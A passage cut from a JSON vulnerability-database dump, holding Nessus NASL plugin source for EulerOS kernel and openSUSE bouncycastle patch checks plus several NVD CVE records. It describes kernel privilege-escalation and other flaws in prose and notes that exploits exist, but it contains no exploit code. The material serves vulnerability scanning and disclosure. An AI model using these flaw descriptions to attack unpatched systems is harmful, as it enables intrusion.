complete_emulated_mmio function\n in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6\n allows guest OS users to execute arbitrary code on the\n host OS by leveraging a loop that triggers an invalid\n memory copy affecting certain cancel_work_item\n data.(CVE-2014-0049i1/4%0\n\n - An issue was discovered in the F2FS filesystem code in\n the Linux kernel in fs/f2fs/inode.c. A denial of\n service due to a slab out-of-bounds read can occur for\n a crafted f2fs filesystem image in which FI_EXTRA_ATTR\n is set in an inode.(CVE-2018-13098i1/4%0\n\n - A vulnerability was found in the Linux kernel where\n having malicious IP options present would cause the\n ipv4_pktinfo_prepare() function to drop/free the dst.\n This could result in a system crash or possible\n privilege escalation.(CVE-2017-5970i1/4%0\n\n - In the Linux kernel's vmw_gb_surface_define_ioctl()\n function, in 'drivers/gpu/drm/vmwgfx/vmwgfx_surface.c'\n file, a 'req-i1/4zmip_levels' is a user-controlled value\n which is later used as a loop count limit. This allows\n local unprivileged user to cause a denial of service by\n a kernel lockup via a crafted ioctl call for a\n '/dev/dri/renderD*' device.(CVE-2017-7346i1/4%0\n\n - It was found that the NFSv4 server in the Linux kernel\n did not properly validate layout type when processing\n NFSv4 pNFS LAYOUTGET and GETDEVICEINFO operands. A\n remote attacker could use this flaw to soft-lockup the\n system and thus cause denial of\n service.(CVE-2017-8797i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1482)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2018-13098", "CVE-2014-7822", "CVE-2017-5577", "CVE-2017-7346", "CVE-2017-18075", "CVE-2017-5970", "CVE-2017-0523", "CVE-2017-8831", "CVE-2016-2547", "CVE-2018-16862", "CVE-2016-7425", "CVE-2017-1000112", "CVE-2014-9803", "CVE-2015-8374", "CVE-2014-0049", "CVE-2017-18216", "CVE-2017-8797", "CVE-2018-6554", "CVE-2018-20511"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1482.NASL", "href": "https://www.tenable.com/plugins/nessus/124806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124806);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\n \"CVE-2014-0049\",\n \"CVE-2014-7822\",\n \"CVE-2014-9803\",\n \"CVE-2015-8374\",\n \"CVE-2016-2547\",\n \"CVE-2016-7425\",\n \"CVE-2016-8655\",\n \"CVE-2017-0523\",\n \"CVE-2017-1000112\",\n \"CVE-2017-18075\",\n \"CVE-2017-18216\",\n \"CVE-2017-5577\",\n \"CVE-2017-5970\",\n \"CVE-2017-7346\",\n \"CVE-2017-8797\",\n \"CVE-2017-8831\",\n \"CVE-2018-13098\",\n \"CVE-2018-16862\",\n \"CVE-2018-20511\",\n \"CVE-2018-6554\"\n );\n script_bugtraq_id(\n 65909,\n 72347\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1482)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - An information-leak vulnerability was found in the\n kernel when it truncated a file to a smaller size which\n consisted of an inline extent that was compressed. The\n data between the new file size and the old file size\n was not discarded and the number of bytes used by the\n inode were not correctly decremented, which gave the\n wrong report for callers of the stat(2) syscall. This\n wasted metadata space and allowed for the truncated\n data to be leaked, and data corruption or loss to\n occur. A caller of the clone ioctl could exploit this\n flaw by using only standard file-system operations\n without root access to read the truncated\n data.(CVE-2015-8374i1/4%0\n\n - crypto/pcrypt.c in the Linux kernel, before 4.14.13,\n mishandles freeing instances, allowing a local user\n able to access the AF_ALG-based AEAD interface\n (CONFIG_CRYPTO_USER_API_AEAD) and pcrypt\n (CONFIG_CRYPTO_PCRYPT) to cause a denial of service\n (kfree of an incorrect pointer) or possibly have\n unspecified other impact by executing a crafted\n sequence of system calls. Due to the nature of the\n flaw, privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2017-18075i1/4%0\n\n - An elevation of privilege vulnerability in the Qualcomm\n Wi-Fi driver could enable a local malicious application\n to execute arbitrary code within the context of the\n kernel. This issue is rated as High because it first\n requires compromising a privileged process. Product:\n Android. Versions: N/A. Android ID: A-32835279.\n References: QC-CR#1096945.(CVE-2017-0523i1/4%0\n\n - The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux\n kernel through 4.10.14 allows local users to cause a\n denial of service (out-of-bounds array access) or\n possibly have unspecified other impact by changing a\n certain sequence-number value, aka a 'double fetch'\n vulnerability.(CVE-2017-8831i1/4%0\n\n - A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. On certain file\n systems, a local, unprivileged user could use this flaw\n to write past the maximum file size, and thus crash the\n system.(CVE-2014-7822i1/4%0\n\n - The vc4_get_bcl function in\n drivers/gpu/drm/vc4/vc4_gem.c in the VideoCore DRM\n driver in the Linux kernel before 4.9.7 does not set an\n errno value upon certain overflow detections allowing\n local users to cause a denial of service (incorrect\n pointer dereference and OOPS) via inconsistent size\n values in a VC4_SUBMIT_CL ioctl call.(CVE-2017-5577i1/4%0\n\n - In fs/ocfs2/cluster/nodemanager.c in the Linux kernel\n before 4.15, local users can cause a denial of service\n (NULL pointer dereference and BUG) because a required\n mutex is not used.(CVE-2017-18216i1/4%0\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets\n implementation in the Linux kernel networking subsystem\n handled synchronization while creating the TPACKET_V3\n ring buffer. A local user able to open a raw packet\n socket (requires the CAP_NET_RAW capability) could use\n this flaw to elevate their privileges on the\n system.(CVE-2016-8655i1/4%0\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112i1/4%0\n\n - A security flaw was found in the Linux kernel in a way\n that the cleancache subsystem clears an inode after the\n final file truncation (removal). The new file created\n with the same inode may contain leftover pages from\n cleancache and the old file data instead of the new\n one.(CVE-2018-16862i1/4%0\n\n - arch/arm64/ include /asm/pgtable.h in the Linux kernel\n before 3.15-rc5-next-20140519, as used in Android\n before 2016-07-05 on Nexus 5X and 6P devices,\n mishandles execute-only pages, which allows attackers\n to gain privileges via a crafted application, aka\n Android internal bug 28557020.(CVE-2014-9803i1/4%0\n\n - A heap-buffer overflow vulnerability was found in the\n arcmsr_iop_message_xfer() function in\n 'drivers/scsi/arcmsr/arcmsr_hba.c' file in the Linux\n kernel through 4.8.2. The function does not restrict a\n certain length field, which allows local users to gain\n privileges or cause a denial of service via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control code. This can\n potentially cause kernel heap corruption and arbitrary\n kernel code execution.(CVE-2016-7425i1/4%0\n\n - An issue was discovered in the Linux kernel before\n 4.18.11. The ipddp_ioctl function in\n drivers/net/appletalk/ipddp.c allows local users to\n obtain sensitive kernel address information by\n leveraging CAP_NET_ADMIN to read the ipddp_route dev\n and next fields via an SIOCFINDIPDDPRT ioctl\n call.(CVE-2018-20511i1/4%0\n\n - A memory leak in the irda_bind function in\n net/irda/af_irda.c in the Linux kernel, through 4.16,\n allows local users to cause a denial of service due to\n a memory consumption by repeatedly binding an AF_IRDA\n socket.(CVE-2018-6554i1/4%0\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n employs a locking approach that does not consider slave\n timer instances, which allows local users to cause a\n denial of service (race condition, use-after-free, and\n system crash) via a crafted ioctl\n call.(CVE-2016-2547i1/4%0\n\n - Buffer overflow in the complete_emulated_mmio function\n in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6\n allows guest OS users to execute arbitrary code on the\n host OS by leveraging a loop that triggers an invalid\n memory copy affecting certain cancel_work_item\n data.(CVE-2014-0049i1/4%0\n\n - An issue was discovered in the F2FS filesystem code in\n the Linux kernel in fs/f2fs/inode.c. A denial of\n service due to a slab out-of-bounds read can occur for\n a crafted f2fs filesystem image in which FI_EXTRA_ATTR\n is set in an inode.(CVE-2018-13098i1/4%0\n\n - A vulnerability was found in the Linux kernel where\n having malicious IP options present would cause the\n ipv4_pktinfo_prepare() function to drop/free the dst.\n This could result in a system crash or possible\n privilege escalation.(CVE-2017-5970i1/4%0\n\n - In the Linux kernel's vmw_gb_surface_define_ioctl()\n function, in 'drivers/gpu/drm/vmwgfx/vmwgfx_surface.c'\n file, a 'req-i1/4zmip_levels' is a user-controlled value\n which is later used as a loop count limit. This allows\n local unprivileged user to cause a denial of service by\n a kernel lockup via a crafted ioctl call for a\n '/dev/dri/renderD*' device.(CVE-2017-7346i1/4%0\n\n - It was found that the NFSv4 server in the Linux kernel\n did not properly validate layout type when processing\n NFSv4 pNFS LAYOUTGET and GETDEVICEINFO operands. A\n remote attacker could use this flaw to soft-lockup the\n system and thus cause denial of\n service.(CVE-2017-8797i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1482\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e3610568\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:51:50", "description": "This update for bouncycastle fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1000613: Fix use of Externally-Controlled Input\n to Select Classes or Code ('Unsafe Reflection')\n (boo#1100694).\n\n - CVE-2017-13098: Fix against Bleichenbacher oracle when\n not using the lightweight APIs (boo#1072697).", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "title": "openSUSE Security Update : bouncycastle (openSUSE-2019-546)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1000613", "CVE-2017-13098"], "modified": "2019-03-27T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:bouncycastle", "p-cpe:/a:novell:opensuse:bouncycastle-javadoc"], "id": "OPENSUSE-2019-546.NASL", "href": "https://www.tenable.com/plugins/nessus/123233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-546.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123233);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-13098\", \"CVE-2018-1000613\");\n\n script_name(english:\"openSUSE Security Update : bouncycastle (openSUSE-2019-546)\");\n script_summary(english:\"Check for the openSUSE-2019-546 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bouncycastle fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1000613: Fix use of Externally-Controlled Input\n to Select Classes or Code ('Unsafe Reflection')\n (boo#1100694).\n\n - CVE-2017-13098: Fix against Bleichenbacher oracle when\n not using the lightweight APIs (boo#1072697).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1072697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100694\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"bouncycastle-1.60-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"bouncycastle-javadoc-1.60-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle / bouncycastle-javadoc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T07:12:50", "description": "The user password via the registration form of TronLink Wallet 2.2.0 is stored in the log when the class CreateWalletTwoActivity is called. Other authenticated users can read it in the log later. The logged data can be read using Logcat on the device. When using platforms prior to Android 4.1 (Jelly Bean), the log data is not sandboxed per application; any application installed on the device has the capability to read data logged by other applications.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-07-22T16:15:00", "title": "CVE-2019-13098", "type": "cve", "cwe": ["CWE-532"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13098"], "modified": "2019-07-24T15:03:00", "cpe": ["cpe:/a:tronlink:wallet:2.2.0"], "id": "CVE-2019-13098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13098", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:tronlink:wallet:2.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "cloudfoundry": [{"lastseen": "2019-10-01T00:30:26", "bulletinFamily": "software", "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-14610", "CVE-2018-13096", "CVE-2018-13098", "CVE-2019-12984", "CVE-2018-13100", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2018-13099", "CVE-2019-13272", "CVE-2018-16862", "CVE-2018-14614", "CVE-2019-12614", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-14612", "CVE-2019-2024", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-1125", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613"], "description": "# \n\n## Severity\n\nMedium\n\n## Vendor\n\nCanonical 